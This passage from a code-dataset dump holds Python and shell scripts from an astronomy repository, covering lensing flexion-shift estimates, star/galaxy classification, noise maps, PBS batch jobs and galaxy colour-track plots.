i][1],mcmcfinal[:,interval * i][2],mcmcfinal[:,interval * i][3],mcmcfinal[:,interval * i][4])\n        if img == 4: glafic[29 - 1] = \"lens pert %s %s %s %s %s 0.000000e+00 0.000000e+00 \\n\" % (z_s,mcmcfinal[:,interval * 
i][6],mcmcfinal[:,interval * i][7],mcmcfinal[:,interval * i][8])\n if img == 2: glafic[29 - 1] = \"lens pert %s %s %s 0.000000e+00 0.000000e+00 0.000000e+00 0.000000e+00 \\n\" % (z_s,mcmcfinal[:,interval * i][5],mcmcfinal[:,interval * i][6])\n glafic[21 - 1] = \"chi2_checknimg 1 \\n\"\n glafic[36 - 1] = \"0 0 0 0 0 0 0 \\n\"\n glafic[37 - 1] = \"0 0 0 0 0 0 0 \\n\"\n glafic[51 - 1] = \"\\n\"\n with open(file[:-6] + \"_einstmagniftime.input\", 'w') as f:\n f.writelines(glafic)\n f.close()\n os.system(\"glafic %s\" % (file[:-6] + \"_einstmagniftime.input\"))\n x = np.loadtxt(fileout)\n if x[0][0] == img:\n with open(file[:-6] + \"_einstmagniftime_out_.dat\", 'a') as f:\n if img == 4: f.write(\"%s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s \\n\" % (x[0][0],x[0][2],x[0][3],x[1][0],x[1][1],x[1][2],x[1][3],x[2][0],x[2][1],x[2][2],x[2][3],x[3][0],x[3][1],x[3][2],x[3][3],x[4][0],x[4][1],x[4][2],x[4][3]))\n if img == 2: f.write(\"%s %s %s %s %s %s %s %s %s %s %s \\n\" % (x[0][0],x[0][2],x[0][3],x[1][0],x[1][1],x[1][2],x[1][3],x[2][0],x[2][1],x[2][2],x[2][3]))\n f.close()\n" }, { "alpha_fraction": 0.5121499300003052, "alphanum_fraction": 0.5928747653961182, "avg_line_length": 34.9555549621582, "blob_id": "ded93300a03a3d51e258f423b883b06506383233", "content_id": "2762e6190b3907182b0bf9222f4344743a22638b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4856, "license_type": "no_license", "max_line_length": 270, "num_lines": 135, "path": "/python/catalogue_utilities/flexionshift.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# calculates flexion shift given a catalogue of stellar masses, redshifts and positions on the sky. Check Behroozi et al 2010, Auger et al 2009 and Jabran Zahid et al 2017 for the applicability of the formulas.\n# To produce the input, run awk '{if (($5<=23) && ($98>=0)) print $1,$2,$3,$4,$5,$6,$29,$30,$31,$41,$86,$87,$88,$89}' rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazylephareclassified_IRACmagslephareclassifiedF160W.cat > WFI2033gal_KenDominique.cat\n\nimport numpy as np\nimport scipy\nfrom scipy import stats\nimport sys\nimport os\nfrom os import system\nfrom astropy.coordinates import SkyCoord\nfrom astropy import units as u\nimport distances\n\n####################\n# Behroozi et al 2010 parameters for z < 1:\nM10_ = 12.35\nM1a_ = 0.28\nMs00_ = 10.72\nMs0a_ = 0.55\nb0_ = 0.44\nba_ = 0.18\nd0_ = 0.57\nda_ = 0.17\ng0_ = 1.56\nga_ = 2.51\n# z >= 1:\nM10 = 12.27\nM1a = -0.84\nMs00 = 11.09\nMs0a = 0.56\nb0 = 0.65\nba = 0.31\nd0 = 0.55\nda = -0.12\ng0 = 1.12\nga = -0.53\n\n####################\n# Auger et al 2009 parameters:\na_aug = 0.23\nb_aug = 0.14\n\n####################\n# Jabran Zahid et al 2017 parameters:\nsb = 10**(2.07)\nMb = 10**(10.26)\na1 = 0.403\na2 = 0.293\n\n####################\nlens = SkyCoord('20:33:42.16 -47:23:44.20', frame='fk5', unit=(u.hourangle, u.deg)) # center of the lensing galaxy\nz_s = 1.66\nz_d = 0.66\ntheta_lens = 0.96 # arcsec # Einstein radius from the Vuissoz et al. 
2008 SIE+gamma model\ndist = distances.Distance()\ndist.OMEGA_M = 0.31 # Planck\ndist.OMEGA_L = 0.69 # Planck\ndist.h = 0.68 # Planck\nD_S = dist.angular_diameter_distance(0,z_s) # in Mpc\nD_DS = dist.angular_diameter_distance(z_d,z_s)\n\n\n\nconst = 9.626*(10**(-20)) # 4GM_sol/c^2 in Mpc\nradinsec = 206265 # radian in arcsec\n\n\n# read from file\nra_ = 2\ndec_ = 3\nz_b_ = 6\nspec_ = 9\nmstarbest_ = 10\nmstarmed_ = 12\n\nfile = \"WFI2033gal_KenDominique.cat\"\nra,dec,z_b,spec,mstarbest,mstarmed,sep,flex_halo,flex_sluse,flex_zahid = np.loadtxt(file,usecols=[ra_,dec_,z_b_,spec_,mstarbest_,mstarmed_,ra_,ra_,ra_,ra_],unpack=True)\nmstarmed[mstarmed < 0] = mstarbest[mstarmed < 0]\nmstar = mstarmed\nmstar_sluse = mstar - np.log10(0.55) # convert to Salpeter, but only for Auger et al 2009 (Sluse), because I computed the masses assuming Chabrier, and so did Zahid et al.\nsigma_zahid = np.zeros(len(mstar))\nz_b[spec>0] = spec[spec>0]\n\nfor i in range(len(ra)):\n    coord=SkyCoord(ra=ra[i]*u.degree, dec=dec[i]*u.degree, frame='fk5')\n    sep_lens = coord.separation(lens).arcsec\n    sep[i] = sep_lens\n    z = z_b[i]\n    a = 1 / (1 + z)\n    if z <= 1:\n        logM1a = M10_ + M1a_ * (a - 1)\n        logMs0a = Ms00_ + Ms0a_ * (a - 1)\n        notlogMs0a = 10 ** logMs0a\n        b = b0_ + ba_ * (a-1)\n        d = d0_ + da_ * (a-1)\n        g = g0_ + ga_ * (a-1)\n        mhalo = logM1a + b * (mstar[i] - logMs0a) + ((10 ** mstar[i]/notlogMs0a)**d)/(1+(10 ** mstar[i]/notlogMs0a)**(-g)) - 0.5 # 0.5 as a float: 1/2 is integer division (= 0) in Python 2\n    else:\n        logM1a = M10 + M1a * (a - 1)\n        logMs0a = Ms00 + Ms0a * (a - 1)\n        notlogMs0a = 10 ** logMs0a\n        b = b0 + ba * (a-1)\n        d = d0 + da * (a-1)\n        g = g0 + ga * (a-1)\n        mhalo = logM1a + b * (mstar[i] - logMs0a) + ((10 ** mstar[i]/notlogMs0a)**d)/(1+(10 ** mstar[i]/notlogMs0a)**(-g)) - 0.5\n    if mstar_sluse[i] > 10.5:\n        fDM = a_aug * (mstar_sluse[i] - 11) + b_aug\n        #print fDM\n        mtotal = (10**mstar_sluse[i]) / (1 - fDM)\n    beta = dist.angular_diameter_distance(z_d,z) * D_S / (dist.angular_diameter_distance(0,z) * D_DS)\n    if z > z_d:\n        fbeta = (1 - beta)**2\n        #print fbeta\n    else:\n        fbeta = 1\n    if 10**(mstar[i]) < Mb:\n        sigma_zahid[i] = sb * ((10**mstar[i] / Mb)**a1)\n    else:\n        sigma_zahid[i] = sb * ((10**mstar[i] / Mb)**a2)\n    theta_halo = np.sqrt((10 ** mhalo) / (10 ** 11.09)) * np.sqrt(1000 * dist.angular_diameter_distance(z,z_s)/(dist.angular_diameter_distance(0,z) * D_S)) # https://en.wikipedia.org/wiki/Einstein_radius I already checked this formula manually\n    theta_zahid = radinsec * 4 * 3.14 * (sigma_zahid[i]/300000)**2 * dist.angular_diameter_distance(z,z_s) / D_S\n    #print theta_zahid\n    flex_halo[i] = fbeta * (theta_lens * theta_halo)**2 / (sep[i]**3)\n    flex_zahid[i] = fbeta * (theta_lens * theta_zahid)**2 / (sep[i]**3)\n    if mstar_sluse[i] > 10.5:\n        theta_sluse = np.sqrt(mtotal / (10 ** 11.09)) * np.sqrt(1000 * dist.angular_diameter_distance(z,z_s)/(dist.angular_diameter_distance(0,z) * D_S)) # https://en.wikipedia.org/wiki/Einstein_radius\n        flex_sluse[i] = fbeta * (theta_lens * theta_sluse)**2 / (sep[i]**3)\n    else:\n        flex_sluse[i] = flex_zahid[i]\n    if z >= z_s:\n        flex_halo[i] = 0\n        flex_sluse[i] = 0\n        flex_zahid[i] = 0\nhead = \"sep flex_halo flex_sluse flex_zahid veldisp\"\nnp.savetxt(file[:-4] + \"_flexionshift.cat\",np.c_[sep,flex_halo,flex_sluse,flex_zahid,sigma_zahid],fmt='%.2f %.4e %.4e %.4e %.2f',header=head)\n\n\n" }, { "alpha_fraction": 0.698019802570343, "alphanum_fraction": 0.7227723002433777, "avg_line_length": 21.44444465637207, "blob_id": "4a0bfa5c4593aa5cbf3565978017cf9138fc8777", "content_id": "7b65e1a9c5376e594ef3cae", "detected_licenses": [], 
"is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 202, "license_type": "no_license", "max_line_length": 42, "num_lines": 9, "path": "/python/image_utilities/mask_flag.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Create a simple blank image\n\nimport numpy as np\nfrom astropy.io import fits\n\nimage = fits.open('ch1_4amin_nolens.fits')\ndata = image[0].data\ndata[data != 0] = 0\nimage.writeto('flg.fits',clobber=True)\n" }, { "alpha_fraction": 0.6585366129875183, "alphanum_fraction": 0.6951219439506531, "avg_line_length": 19.5, "blob_id": "42a1898482764b0145863934033c40051ab30fdc", "content_id": "2f132d8148ed6624dd551ad302c989e4b8c3df02", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 82, "license_type": "no_license", "max_line_length": 32, "num_lines": 4, "path": "/python/scripts/NAOJ/test.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n#PBS -l select=1:ncpus=3:mem=1gb\n#PBS -N HelloJob\nprint \"Hello\"\n" }, { "alpha_fraction": 0.6797752976417542, "alphanum_fraction": 0.704119861125946, "avg_line_length": 27.105262756347656, "blob_id": "26b7ce7b614051ce70c8f7ec582c8284a337d942", "content_id": "a8bcaa050b204390234fef6245786e7db1bcbe22", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 534, "license_type": "no_license", "max_line_length": 115, "num_lines": 19, "path": "/python/image_utilities/sexnoisemap.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Simple script that combines Sextractor OBJECTS and BACKGROUND_RMS images into a sigma map. NGAIN is NCOMBINExGAIN\n# run as python sexnoisemap.py obj.fits rms.fits out.fits NGAIN\n\nimport numpy as np\nimport sys\nfrom astropy.io import fits\n\nngain = float(str(sys.argv[4]))\nim = fits.open(str(sys.argv[1]))\nim[0].data = im[0].data / ngain\n\nimr = fits.open(str(sys.argv[2]))\nimr[0].data = imr[0].data ** 2\n\nout = np.sqrt(im[0].data + imr[0].data)\nout[out < 0] = np.median(out)\n\nim[0].data = out\nim.writeto(str(sys.argv[3]),clobber=True)\n" }, { "alpha_fraction": 0.6006515622138977, "alphanum_fraction": 0.6505486965179443, "avg_line_length": 57.90909194946289, "blob_id": "2777695f574512465d579b79e41d63334c4c074c", "content_id": "8a937814c7424ff5da5491366b513804e8b1d8d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5832, "license_type": "no_license", "max_line_length": 487, "num_lines": 99, "path": "/python/catalogue_utilities/classification.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "##########################\n# Classifies galaxies and stars following the CFHTLenS method and available spectroscopic info\n##########################\n\nimport numpy as np \n\n#file = \"i_detect_i_and_ir_rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazylephare.cat\"\n#file = \"i_detect_i_and_ir_rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazylephareclassified_IRACmagslephare.cat\"\n#file = \"rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazylephare.cat\"\nfile = \"rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazylephareclassified_IRACmagslephare.cat\"\nlimrad = 2.45\n\nid = 8\n#chi_gal_bpz = 58\n#chi_star_bpz = 59\n#chi_gal_eazy = 65\n#chi_star_eazy = 66\nchi_gal_bpz = 83 # for IRAC\nchi_star_bpz = 84 # for IRAC\nchi_gal_eazy = 90 
# for IRAC\nchi_star_eazy = 91 # for IRAC\nradius = 6\nmag = 4\nspec = 40\nclassify1_bpz = 8 # first pass, CFHTLenS, fake index\nclassify2_bpz = 8 # second pass, including spectroscopic info, fake index\nclassify1_eazy = 8 # first pass, CFHTLenS, fake index\nclassify2_eazy = 8 # second pass, including spectroscopic info, fake index\n\ndata = np.loadtxt(file,usecols=(id,chi_gal_bpz,chi_star_bpz,chi_gal_eazy,chi_star_eazy,radius,mag,spec,classify1_bpz,classify2_bpz,classify1_eazy,classify2_eazy),unpack=True)\n\n# indexing\nid = 0\nchi_gal_bpz = 1\nchi_star_bpz = 2\nchi_gal_eazy = 3\nchi_star_eazy = 4\nradius = 5\nmag = 6\nspec = 7\nclassify1_bpz = 8\nclassify2_bpz = 9\nclassify1_eazy = 10\nclassify2_eazy = 11\n\n# CFHTLenS method: star=0 gal=1\nfor i in range(len(data[id])):\n if data[mag][i] < 21:\n if data[radius][i] <= limrad:\n data[classify1_bpz][i] = 0\n data[classify1_eazy][i] = 0\n else:\n data[classify1_bpz][i] = 1\n data[classify1_eazy][i] = 1\n if data[mag][i] >= 21 and data[mag][i] <= 23:\n if data[radius][i] <= limrad and data[chi_star_bpz][i] < 2.0 * data[chi_gal_bpz][i]:\n data[classify1_bpz][i] = 0\n else: data[classify1_bpz][i] = 1\n if data[radius][i] <= limrad and data[chi_star_eazy][i] < 2.0 * data[chi_gal_eazy][i]:\n data[classify1_eazy][i] = 0\n else: data[classify1_eazy][i] = 1\n if data[mag][i] > 23:\n data[classify1_bpz][i] = 1\n data[classify1_eazy][i] = 1\n\n# include the spectroscopic knowledge:\n# nospec star -3\n# nospec gal 2\n# spec star ok -1\n# spec star wrong -2\n# spec gal ok 0\n# spec gal wrong 1\ndata[classify2_bpz][(data[classify1_bpz] == 0) & (data[spec] == -1)] = -3\ndata[classify2_bpz][(data[classify1_bpz] == 1) & (data[spec] == -1)] = 2\ndata[classify2_bpz][(data[classify1_bpz] == 0) & (data[spec] == -2)] = -1\ndata[classify2_bpz][(data[classify1_bpz] == 1) & (data[spec] == -2)] = -2\ndata[classify2_bpz][(data[classify1_bpz] == 1) & (data[spec] >= 0)] = 0\ndata[classify2_bpz][(data[classify1_bpz] == 0) & (data[spec] >= 0)] = 1\n\ndata[classify2_eazy][(data[classify1_eazy] == 0) & (data[spec] == -1)] = -3\ndata[classify2_eazy][(data[classify1_eazy] == 1) & (data[spec] == -1)] = 2\ndata[classify2_eazy][(data[classify1_eazy] == 0) & (data[spec] == -2)] = -1\ndata[classify2_eazy][(data[classify1_eazy] == 1) & (data[spec] == -2)] = -2\ndata[classify2_eazy][(data[classify1_eazy] == 1) & (data[spec] >= 0)] = 0\ndata[classify2_eazy][(data[classify1_eazy] == 0) & (data[spec] >= 0)] = 1\n\nprint \"spectroscopic gal/stars:\",len(data[spec][data[spec] >= 0]),\"/\",len(data[spec][data[spec] == -2])\nprint \"CFHTLenS based gal/stars (BPZ):\",len(data[classify1_bpz][data[classify1_bpz]==1]),\"/\",len(data[classify1_bpz][data[classify1_bpz]==0]),\" (\",len(data[classify1_bpz][data[classify1_bpz]==1]) * 100.0 / (len(data[classify1_bpz][data[classify1_bpz]==1])+len(data[classify1_bpz][data[classify1_bpz]==0])),\"%,\",len(data[classify1_bpz][data[classify1_bpz]==0])*100.0/(len(data[classify1_bpz][data[classify1_bpz]==1])+len(data[classify1_bpz][data[classify1_bpz]==0])),\"%)\"\nprint \"incorrectly identified gals (BPZ):\",len(data[classify2_bpz][data[classify2_bpz] == 1]),\"/\",len(data[spec][data[spec]>= 0]),\",\", 100.0 * len(data[classify2_bpz][data[classify2_bpz] == 1]) / len(data[spec][data[spec]>= 0]), \"+/-\", np.sqrt(len(data[classify2_bpz][data[classify2_bpz] == 1])), \"%\"\nprint \"incorrectly identified stars (BPZ):\",len(data[classify2_bpz][data[classify2_bpz] == -2]),\"/\",len(data[spec][data[spec] == -2]),\",\", 100.0 * 
len(data[classify2_bpz][data[classify2_bpz] == -2]) / len(data[spec][data[spec] == -2]), \"+/-\", np.sqrt(len(data[classify2_bpz][data[classify2_bpz] == -2])), \"%\"\n\nprint \"CFHTLenS based gal/stars (eazy):\",len(data[classify1_eazy][data[classify1_eazy]==1]),\"/\",len(data[classify1_eazy][data[classify1_eazy]==0]),\" (\",len(data[classify1_eazy][data[classify1_eazy]==1]) * 100.0 / (len(data[classify1_eazy][data[classify1_eazy]==1])+len(data[classify1_eazy][data[classify1_eazy]==0])),\"%,\",len(data[classify1_eazy][data[classify1_eazy]==0])*100.0/(len(data[classify1_eazy][data[classify1_eazy]==1])+len(data[classify1_eazy][data[classify1_eazy]==0])),\"%)\"\nprint \"incorrectly identified gals (eazy):\",len(data[classify2_eazy][data[classify2_eazy] == 1]),\"/\",len(data[spec][data[spec]>= 0]),\",\", 100.0 * len(data[classify2_eazy][data[classify2_eazy] == 1]) / len(data[spec][data[spec]>= 0]), \"+/-\", np.sqrt(len(data[classify2_eazy][data[classify2_eazy] == 1])), \"%\"\nprint \"incorrectly identified stars (eazy):\",len(data[classify2_eazy][data[classify2_eazy] == -2]),\"/\",len(data[spec][data[spec] == -2]),\",\", 100.0 * len(data[classify2_eazy][data[classify2_eazy] == -2]) / len(data[spec][data[spec] == -2]), \"+/-\", np.sqrt(len(data[classify2_eazy][data[classify2_eazy] == -2])), \"%\"\n\nfileout = file[:-4] + \"_classification.cat\"\nstr = \"ID class_bpz class_eazy\"\ndataout = np.c_[data[id],data[classify2_bpz],data[classify2_eazy]]\nnp.savetxt(fileout,dataout,header=str,fmt='%d \\t %d \\t %d \\t')\n" }, { "alpha_fraction": 0.6681514382362366, "alphanum_fraction": 0.7661470174789429, "avg_line_length": 23.94444465637207, "blob_id": "cecb764cfbf9586231243e06f4bfc2e2590128ed", "content_id": "251866bf5fcd822d6c762d36862b61ff18bb1c56", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 449, "license_type": "no_license", "max_line_length": 103, "num_lines": 18, "path": "/python/scripts/NAOJ/batch_infer10.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1m\n#PBS -o Log10.out\n#PBS -e Log10.err\n#PBS -N 10\n#PBS -l mem=16gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /mfst01a/rusucs/WFI2033/MSwghtratios/\n\npython inferkappa_unbiasedwithshearincrement2228.py WFI2033 5 45 23 meds gal gamma oneoverr mass2overr\npython inferkappa_unbiasedwithshearincrement2228.py WFI2033 5 120 23 meds gal gamma oneoverr mass2overr\n" }, { "alpha_fraction": 0.7010309100151062, "alphanum_fraction": 0.8247422575950623, "avg_line_length": 96, "blob_id": "3ccd49635a8fdbea06bde23bea073d151d58e06b", "content_id": "3917b41d7062d9fe15417506c0d3208897566933", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 776, "license_type": "no_license", "max_line_length": 96, "num_lines": 8, "path": "/python/scripts/NAOJ/script_extractMillennium6.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "python extractMillennium_Henriques.py GGL_los_8_5_0_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_5_1_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_5_2_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_5_3_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py 
GGL_los_8_5_4_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_5_5_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_5_6_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_5_7_N_4096_ang_4_Henriques2014_galaxies_on_plane\n" }, { "alpha_fraction": 0.5796194076538086, "alphanum_fraction": 0.6865561604499817, "avg_line_length": 52.235294342041016, "blob_id": "bfe2e4aaab4cf8f7195a09f90a781349ea9881a7", "content_id": "114dc8c26403e3c82d76c4595f59650eace575a1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 24435, "license_type": "no_license", "max_line_length": 270, "num_lines": 459, "path": "/python/plot_utilities/plot_galcolortracks.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# plots observed galaxy colors versus theoretical tracks from BPZ\n# this file consists of multiple codes added one after another for each filter combination\n\nimport numpy as np\nimport pylab as plt\nu,u_err,g,g_err,r,r_err,i,i_err,z,z_err,Y,Y_err,J,J_err,H,H_err,K,K_err=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/test/rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_forbpzspecz.cat\",usecols=[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18],unpack=True)\nu = u + 1.42\ng = g + 0.01\nr = r + 0.03\ni = i + 0.00\nz = z - 0.02\nY = Y - 0.09\nJ = J - 0.075\nH = H - 0.02\nK = K - 0.07\nerr_x = np.sqrt(J_err**2 + H_err**2)\nerr_y = np.sqrt(H_err**2 + K_err**2)\nplt.clf()\nplt.errorbar(J-H,H-K,xerr=err_x,yerr=err_y,color='black',linestyle=\"None\")\nsbc_J=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Sbc_B2004a.J_HAWKI.AB\",usecols=[1],unpack=True)\nsbc_H=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Sbc_B2004a.H_HAWKI.AB\",usecols=[1],unpack=True)\nsbc_Ks=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Sbc_B2004a.Ks_HAWKI.AB\",usecols=[1],unpack=True)\nel_J=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/El_B2004a.J_HAWKI.AB\",usecols=[1],unpack=True)\nel_H=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/El_B2004a.H_HAWKI.AB\",usecols=[1],unpack=True)\nel_Ks=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/El_B2004a.Ks_HAWKI.AB\",usecols=[1],unpack=True)\nscd_J=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Scd_B2004a.J_HAWKI.AB\",usecols=[1],unpack=True)\nscd_H=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Scd_B2004a.H_HAWKI.AB\",usecols=[1],unpack=True)\nscd_Ks=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Scd_B2004a.Ks_HAWKI.AB\",usecols=[1],unpack=True)\nsb3_J=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB3_B2004a.J_HAWKI.AB\",usecols=[1],unpack=True)\nsb3_H=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB3_B2004a.H_HAWKI.AB\",usecols=[1],unpack=True)\nsb3_Ks=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB3_B2004a.Ks_HAWKI.AB\",usecols=[1],unpack=True)\nsb2_J=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB2_B2004a.J_HAWKI.AB\",usecols=[1],unpack=True)\nsb2_H=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB2_B2004a.H_HAWKI.AB\",usecols=[1],unpack=True)\nsb2_Ks=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB2_B2004a.Ks_HAWKI.AB\",usecols=[1],unpack=True)\nim_J=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Im_B2004a.J_HAWKI.AB\",usecols=[1],unpack=True)\nim_H=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Im_B2004a.H_HAWKI.AB\",usecols=[1],unpack=True)\nim_Ks=np.loa
dtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Im_B2004a.Ks_HAWKI.AB\",usecols=[1],unpack=True)\nsbc_J=sbc_J[:100] # in order to constraint redshift between 0 and 1\nsbc_H=sbc_H[:100]\nsbc_Ks=sbc_Ks[:100]\nel_J=el_J[:100]\nel_H=el_H[:100]\nel_Ks=el_Ks[:100]\nscd_J=scd_J[:100]\nscd_H=scd_H[:100]\nscd_Ks=scd_Ks[:100]\nsb3_J=sb3_J[:100]\nsb3_H=sb3_H[:100]\nsb3_Ks=sb3_Ks[:100]\nsb2_J=sb2_J[:100]\nsb2_H=sb2_H[:100]\nsb2_Ks=sb2_Ks[:100]\nim_J=im_J[:100]\nim_H=im_H[:100]\nim_Ks=im_Ks[:100]\n# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! FOR JHK ONLY I NEED TO DO CONVERSION FROM AB (TEMPLATES) TO VEGA (OBSERVED)\n# MOIRCS J: AB-Vega= 0.91\n# MOIRCS H: AB-Vega= 1.35\n# MOIRCS Ks: AB-Vega= 1.83\nplt.plot(-2.5*np.log10(sbc_J/sbc_H)-0.91+1.35,-2.5*np.log10(sbc_H/sbc_Ks)-1.35+1.83,color='blue',label='Sbc')\nplt.plot(-2.5*np.log10(el_J/el_H)-0.91+1.35,-2.5*np.log10(el_H/el_Ks)-1.35+1.83,color='red',label='El')\nplt.plot(-2.5*np.log10(scd_J/scd_H)-0.91+1.35,-2.5*np.log10(scd_H/scd_Ks)-1.35+1.83,color='cyan',label='Scd')\nplt.plot(-2.5*np.log10(sb3_J/sb3_H)-0.91+1.35,-2.5*np.log10(sb3_H/sb3_Ks)-1.35+1.83,color='magenta',label='SB3')\nplt.plot(-2.5*np.log10(sb2_J/sb2_H)-0.91+1.35,-2.5*np.log10(sb2_H/sb2_Ks)-1.35+1.83,color='brown',label='SB2')\nplt.plot(-2.5*np.log10(im_J/im_H)-0.91+1.35,-2.5*np.log10(im_H/im_Ks)-1.35+1.83,color='gray',label='Im')\nplt.xlabel(\"J-H\")\nplt.ylabel(\"H-Ks\")\nplt.xlim((-1,2))\nplt.ylim((-1,2))\nplt.legend()\nplt.show()\n\n##################################\n\nimport pylab as plt\nu,u_err,g,g_err,r,r_err,i,i_err,z,z_err,Y,Y_err,J,J_err,H,H_err,K,K_err=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/test/rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_forbpzspecz.cat\",usecols=[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18],unpack=True)\nu = u + 1.42\ng = g + 0.01\nr = r + 0.03\ni = i + 0.00\nz = z - 0.02\nY = Y - 0.09\nJ = J - 0.075\nH = H - 0.02\nK = K - 0.07\nerr_x = np.sqrt(u_err**2 + g_err**2)\nerr_y = np.sqrt(g_err**2 + 
r_err**2)\nplt.clf()\nplt.errorbar(u-g,g-r,xerr=err_x,yerr=err_y,color='black',linestyle=\"None\")\nsbc_u=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Sbc_B2004a.u_DEC.AB\",usecols=[1],unpack=True)\nsbc_g=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Sbc_B2004a.g_DEC.AB\",usecols=[1],unpack=True)\nsbc_r=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Sbc_B2004a.r_DEC.AB\",usecols=[1],unpack=True)\nel_u=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/El_B2004a.u_DEC.AB\",usecols=[1],unpack=True)\nel_g=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/El_B2004a.g_DEC.AB\",usecols=[1],unpack=True)\nel_r=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/El_B2004a.r_DEC.AB\",usecols=[1],unpack=True)\nscd_u=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Scd_B2004a.u_DEC.AB\",usecols=[1],unpack=True)\nscd_g=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Scd_B2004a.g_DEC.AB\",usecols=[1],unpack=True)\nscd_r=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Scd_B2004a.r_DEC.AB\",usecols=[1],unpack=True)\nsb3_u=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB3_B2004a.u_DEC.AB\",usecols=[1],unpack=True)\nsb3_g=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB3_B2004a.g_DEC.AB\",usecols=[1],unpack=True)\nsb3_r=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB3_B2004a.r_DEC.AB\",usecols=[1],unpack=True)\nsb2_u=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB2_B2004a.u_DEC.AB\",usecols=[1],unpack=True)\nsb2_g=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB2_B2004a.g_DEC.AB\",usecols=[1],unpack=True)\nsb2_r=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB2_B2004a.r_DEC.AB\",usecols=[1],unpack=True)\nim_u=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Im_B2004a.u_DEC.AB\",usecols=[1],unpack=True)\nim_g=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Im_B2004a.g_DEC.AB\",usecols=[1],unpack=True)\nim_r=np.loadtxt(\"/Users/eduardrusu